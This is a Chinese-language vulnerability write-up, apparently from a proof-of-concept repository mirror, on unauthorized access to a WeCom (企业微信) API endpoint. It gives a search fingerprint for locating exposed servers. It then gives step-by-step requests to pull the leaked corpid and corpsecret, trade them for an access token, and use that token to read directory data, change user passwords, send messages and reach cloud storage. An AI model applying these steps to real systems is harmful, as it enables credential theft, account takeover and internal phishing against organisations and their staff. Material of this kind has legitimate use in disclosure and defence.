mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 11:26:58 +00:00
46 lines
1.8 KiB
Markdown
46 lines
1.8 KiB
Markdown
|
|
# 企业微信接口未授权访问漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
企业微信/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息,可导致企业微信全量数据被获取,文件获取、使用企业微信轻应用对内利用发送钓鱼文件和链接等风险。
|
|||
|
|
|
|||
|
|
# 二、影响版本
|
|||
|
|
+ 企业微信
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ hunter:`web.icon=="e1750fed09bcc7df102a0e593ffe2b69"`
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
+ 登录页面:
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
1. 通过泄露信息接口可以获取`corpid`和`corpsecret`
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
https://<企业微信域名>/cgi-bin/gateway/agentinfo
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
2. 使用`corpsecret`和`corpid`获得`token`,其中`corpid`为上图中`strcorpid`、`corpsecret`为上图中`Secret`
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
3. 使用token访问诸如企业通讯录信息,修改用户密码,发送消息,云盘等接口
|
|||
|
|
|
|||
|
|
具体利用查看[企业微信开发者中心文档](https://developer.work.weixin.qq.com/document/path/90664)
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-02-29 23:58:31
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gb52tl24nioiceab>
|